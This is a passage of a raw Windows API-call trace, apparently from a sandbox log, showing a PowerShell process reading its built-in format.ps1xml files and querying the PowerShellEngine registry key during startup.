ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0c3fbd, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2eaa6bc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1 [0052.620] GetLastError () returned 0xcb [0052.620] SetErrorMode (uMode=0x1) returned 0x1 [0052.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e6e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0052.620] GetLastError () returned 0xcb [0052.620] SetErrorMode (uMode=0x1) returned 0x1 [0052.620] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14eb68 | out: lpFileInformation=0x14eb68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a11027b, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a11027b, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2ed081c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1 [0052.620] GetLastError () returned 0xcb [0052.620] SetErrorMode (uMode=0x1) returned 0x1 [0052.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e6e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47 [0052.620] GetLastError () returned 0xcb [0052.620] SetErrorMode (uMode=0x1) returned 0x1 [0052.620] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14eb68 | out: lpFileInformation=0x14eb68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a182698, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a182698, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd368cf9c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1 [0052.620] GetLastError () returned 0xcb [0052.621] SetErrorMode (uMode=0x1) returned 0x1 [0052.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e6e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0052.621] GetLastError () returned 0xcb [0052.621] SetErrorMode (uMode=0x1) returned 0x1 [0052.621] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14eb68 | out: lpFileInformation=0x14eb68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1a87f7, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1a87f7, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd36b30fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1 [0052.621] GetLastError () returned 0xcb [0052.621] SetErrorMode (uMode=0x1) returned 0x1 [0052.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e6e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0052.621] GetLastError () returned 0xcb [0052.621] SetErrorMode (uMode=0x1) returned 0x1 [0052.621] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14eb68 | out: lpFileInformation=0x14eb68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1ce956, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1ce956, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd372551c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1 [0052.621] GetLastError () returned 0xcb [0052.621] SetErrorMode (uMode=0x1) returned 0x1 [0052.622] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0052.622] GetLastError () returned 0xcb [0052.628] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0052.628] GetLastError () returned 0xcb [0052.628] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0052.628] GetLastError () returned 0xcb [0052.629] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0052.629] GetLastError () returned 0xcb [0052.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e47c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0052.629] GetLastError () returned 0xcb [0052.629] SetErrorMode (uMode=0x1) returned 0x1 [0052.630] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8 [0052.630] GetLastError () returned 0x0 [0052.630] GetFileType (hFile=0x2f8) returned 0x1 [0052.630] SetErrorMode (uMode=0x1) returned 0x1 [0052.630] GetFileType (hFile=0x2f8) returned 0x1 [0052.630] ReadFile (in: hFile=0x2f8, lpBuffer=0x232f734, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x232f734*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.642] GetLastError () returned 0x0 [0052.643] ReadFile (in: hFile=0x2f8, lpBuffer=0x232f734, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x232f734*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.643] GetLastError () returned 0x0 [0052.643] ReadFile (in: hFile=0x2f8, lpBuffer=0x232f734, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x232f734*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.643] GetLastError () returned 0x0 [0052.643] ReadFile (in: hFile=0x2f8, lpBuffer=0x232f734, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x232f734*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.643] GetLastError () returned 0x0 [0052.644] ReadFile (in: hFile=0x2f8, lpBuffer=0x232f734, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x232f734*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.644] GetLastError () returned 0x0 [0052.644] ReadFile (in: hFile=0x2f8, lpBuffer=0x232f734, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x232f734*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.644] GetLastError () returned 0x0 [0052.644] ReadFile (in: hFile=0x2f8, lpBuffer=0x232f734, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x232f734*, lpNumberOfBytesRead=0x14e9e4*=0x9e2, lpOverlapped=0x0) returned 1 [0052.644] GetLastError () returned 0x0 [0052.644] ReadFile (in: hFile=0x2f8, lpBuffer=0x232ecb6, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x232ecb6*, lpNumberOfBytesRead=0x14e9e4*=0x0, lpOverlapped=0x0) returned 1 [0052.644] GetLastError () returned 0x0 [0052.644] ReadFile (in: hFile=0x2f8, lpBuffer=0x232f734, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x232f734*, lpNumberOfBytesRead=0x14e9e4*=0x0, lpOverlapped=0x0) returned 1 [0052.644] GetLastError () returned 0x0 [0052.644] CloseHandle (hObject=0x2f8) returned 1 [0052.644] GetLastError () returned 0x0 [0052.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e544, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0052.644] GetLastError () returned 0x0 [0052.644] SetErrorMode (uMode=0x1) returned 0x1 [0052.644] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x23407f0 | out: lpFileInformation=0x23407f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a02ba41, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a02ba41, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e5e3fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1 [0052.645] GetLastError () returned 0x0 [0052.645] SetErrorMode (uMode=0x1) returned 0x1 [0052.645] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0052.645] GetLastError () returned 0x0 [0052.645] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e968 | out: phkResult=0x14e968*=0x2f8) returned 0x0 [0052.645] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e9b0, lpData=0x0, lpcbData=0x14e9ac*=0x0 | out: lpType=0x14e9b0*=0x1, lpData=0x0, lpcbData=0x14e9ac*=0x56) returned 0x0 [0052.645] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e9b0, lpData=0x3175c0, lpcbData=0x14e9ac*=0x56 | out: lpType=0x14e9b0*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14e9ac*=0x56) returned 0x0 [0052.645] RegCloseKey (hKey=0x2f8) returned 0x0 [0052.645] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0052.645] GetLastError () returned 0x0 [0052.645] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e4a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0052.645] GetLastError () returned 0x0 [0052.697] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x27fc746b, Data2=0xd3dd, Data3=0x4908, Data4=([0]=0xa3, [1]=0x79, [2]=0xb5, [3]=0x0, [4]=0xeb, [5]=0x50, [6]=0xa9, [7]=0xf4))) returned 0x0 [0052.705] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x6b318506, Data2=0x6fa3, Data3=0x48fd, Data4=([0]=0xaa, [1]=0xd6, [2]=0xf0, [3]=0xe7, [4]=0xa5, [5]=0x7d, [6]=0x91, [7]=0x39))) returned 0x0 [0052.706] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e47c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0052.706] GetLastError () returned 0x0 [0052.706] SetErrorMode (uMode=0x1) returned 0x1 [0052.706] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8 [0052.706] GetLastError () returned 0x0 [0052.706] GetFileType (hFile=0x2f8) returned 0x1 [0052.706] SetErrorMode (uMode=0x1) returned 0x1 [0052.706] GetFileType (hFile=0x2f8) returned 0x1 [0052.707] ReadFile (in: hFile=0x2f8, lpBuffer=0x2353ad8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2353ad8*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.708] GetLastError () returned 0x0 [0052.708] ReadFile (in: hFile=0x2f8, lpBuffer=0x2353ad8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2353ad8*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.708] GetLastError () returned 0x0 [0052.708] ReadFile (in: hFile=0x2f8, lpBuffer=0x2353ad8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2353ad8*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.708] GetLastError () returned 0x0 [0052.709] ReadFile (in: hFile=0x2f8, lpBuffer=0x2353ad8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2353ad8*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.709] GetLastError () returned 0x0 [0052.709] ReadFile (in: hFile=0x2f8, lpBuffer=0x2353ad8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2353ad8*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.709] GetLastError () returned 0x0 [0052.709] ReadFile (in: hFile=0x2f8, lpBuffer=0x2353ad8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2353ad8*, lpNumberOfBytesRead=0x14e9e4*=0xfb2, lpOverlapped=0x0) returned 1 [0052.709] GetLastError () returned 0x0 [0052.709] ReadFile (in: hFile=0x2f8, lpBuffer=0x235322a, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x235322a*, lpNumberOfBytesRead=0x14e9e4*=0x0, lpOverlapped=0x0) returned 1 [0052.709] GetLastError () returned 0x0 [0052.709] ReadFile (in: hFile=0x2f8, lpBuffer=0x2353ad8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2353ad8*, lpNumberOfBytesRead=0x14e9e4*=0x0, lpOverlapped=0x0) returned 1 [0052.709] GetLastError () returned 0x0 [0052.709] CloseHandle (hObject=0x2f8) returned 1 [0052.709] GetLastError () returned 0x0 [0052.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e544, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0052.710] GetLastError () returned 0x0 [0052.710] SetErrorMode (uMode=0x1) returned 0x1 [0052.710] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2374368 | out: lpFileInformation=0x2374368*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1f4ab5, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1f4ab5, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd374b67c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1 [0052.710] GetLastError () returned 0x0 [0052.710] SetErrorMode (uMode=0x1) returned 0x1 [0052.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0052.710] GetLastError () returned 0x0 [0052.710] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e968 | out: phkResult=0x14e968*=0x2f8) returned 0x0 [0052.710] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e9b0, lpData=0x0, lpcbData=0x14e9ac*=0x0 | out: lpType=0x14e9b0*=0x1, lpData=0x0, lpcbData=0x14e9ac*=0x56) returned 0x0 [0052.710] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e9b0, lpData=0x3175c0, lpcbData=0x14e9ac*=0x56 | out: lpType=0x14e9b0*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14e9ac*=0x56) returned 0x0 [0052.710] RegCloseKey (hKey=0x2f8) returned 0x0 [0052.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0052.710] GetLastError () returned 0x0 [0052.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e4a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0052.710] GetLastError () returned 0x0 [0052.711] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x21d2533d, Data2=0x140f, Data3=0x4ccd, Data4=([0]=0xb3, [1]=0x11, [2]=0x31, [3]=0x6, [4]=0x13, [5]=0xf4, [6]=0x3a, [7]=0x95))) returned 0x0 [0052.711] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x7573100, Data2=0xb190, Data3=0x4f3f, Data4=([0]=0x89, [1]=0x74, [2]=0x83, [3]=0xd4, [4]=0xbd, [5]=0x29, [6]=0x6d, [7]=0xa9))) returned 0x0 [0052.713] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xb729993a, Data2=0xd2af, Data3=0x49e8, Data4=([0]=0xa0, [1]=0x44, [2]=0x93, [3]=0x9e, [4]=0xa7, [5]=0x52, [6]=0xd6, [7]=0x26))) returned 0x0 [0052.713] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x6719ad0c, Data2=0xf4a9, Data3=0x4bbb, Data4=([0]=0x96, [1]=0xb2, [2]=0xae, [3]=0x77, [4]=0xd2, [5]=0x30, [6]=0x6a, [7]=0xcf))) returned 0x0 [0052.713] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x6b684ea3, Data2=0xd0a5, Data3=0x4c7e, Data4=([0]=0x99, [1]=0x36, [2]=0xaa, [3]=0x9, [4]=0x3c, [5]=0xb2, [6]=0xea, [7]=0x4d))) returned 0x0 [0052.713] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x78d915ba, Data2=0xbfc9, Data3=0x4f90, Data4=([0]=0xa5, [1]=0x11, [2]=0x7b, [3]=0x12, [4]=0xf, [5]=0xe5, [6]=0x12, [7]=0xb7))) returned 0x0 [0052.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e47c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0052.713] GetLastError () returned 0x0 [0052.713] SetErrorMode (uMode=0x1) returned 0x1 [0052.714] GetFileType (hFile=0x2f8) returned 0x1 [0052.714] SetErrorMode (uMode=0x1) returned 0x1 [0052.714] GetFileType (hFile=0x2f8) returned 0x1 [0052.714] ReadFile (in: hFile=0x2f8, lpBuffer=0x2393d10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2393d10*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.715] GetLastError () returned 0x0 [0052.715] ReadFile (in: hFile=0x2f8, lpBuffer=0x2393d10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2393d10*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.716] GetLastError () returned 0x0 [0052.716] ReadFile (in: hFile=0x2f8, lpBuffer=0x2393d10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2393d10*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.716] GetLastError () returned 0x0 [0052.716] ReadFile (in: hFile=0x2f8, lpBuffer=0x2393d10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2393d10*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.716] GetLastError () returned 0x0 [0052.716] ReadFile (in: hFile=0x2f8, lpBuffer=0x2393d10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2393d10*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.716] GetLastError () returned 0x0 [0052.716] ReadFile (in: hFile=0x2f8, lpBuffer=0x2393d10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2393d10*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.717] GetLastError () returned 0x0 [0052.717] ReadFile (in: hFile=0x2f8, lpBuffer=0x2393d10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2393d10*, lpNumberOfBytesRead=0x14e9e4*=0xaca, lpOverlapped=0x0) returned 1 [0052.717] GetLastError () returned 0x0 [0052.717] ReadFile (in: hFile=0x2f8, lpBuffer=0x239337a, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x239337a*, lpNumberOfBytesRead=0x14e9e4*=0x0, lpOverlapped=0x0) returned 1 [0052.717] GetLastError () returned 0x0 [0052.717] ReadFile (in: hFile=0x2f8, lpBuffer=0x2393d10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2393d10*, lpNumberOfBytesRead=0x14e9e4*=0x0, lpOverlapped=0x0) returned 1 [0052.717] GetLastError () returned 0x0 [0052.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e544, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0052.717] GetLastError () returned 0x0 [0052.717] SetErrorMode (uMode=0x1) returned 0x1 [0052.717] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x23b4d0c | out: lpFileInformation=0x23b4d0c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a051ba0, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a051ba0, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2d2d8fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1 [0052.717] GetLastError () returned 0x0 [0052.717] SetErrorMode (uMode=0x1) returned 0x1 [0052.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0052.717] GetLastError () returned 0x0 [0052.717] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e968 | out: phkResult=0x14e968*=0x2f8) returned 0x0 [0052.717] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e9b0, lpData=0x0, lpcbData=0x14e9ac*=0x0 | out: lpType=0x14e9b0*=0x1, lpData=0x0, lpcbData=0x14e9ac*=0x56) returned 0x0 [0052.717] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e9b0, lpData=0x3175c0, lpcbData=0x14e9ac*=0x56 | out: lpType=0x14e9b0*=0x1, 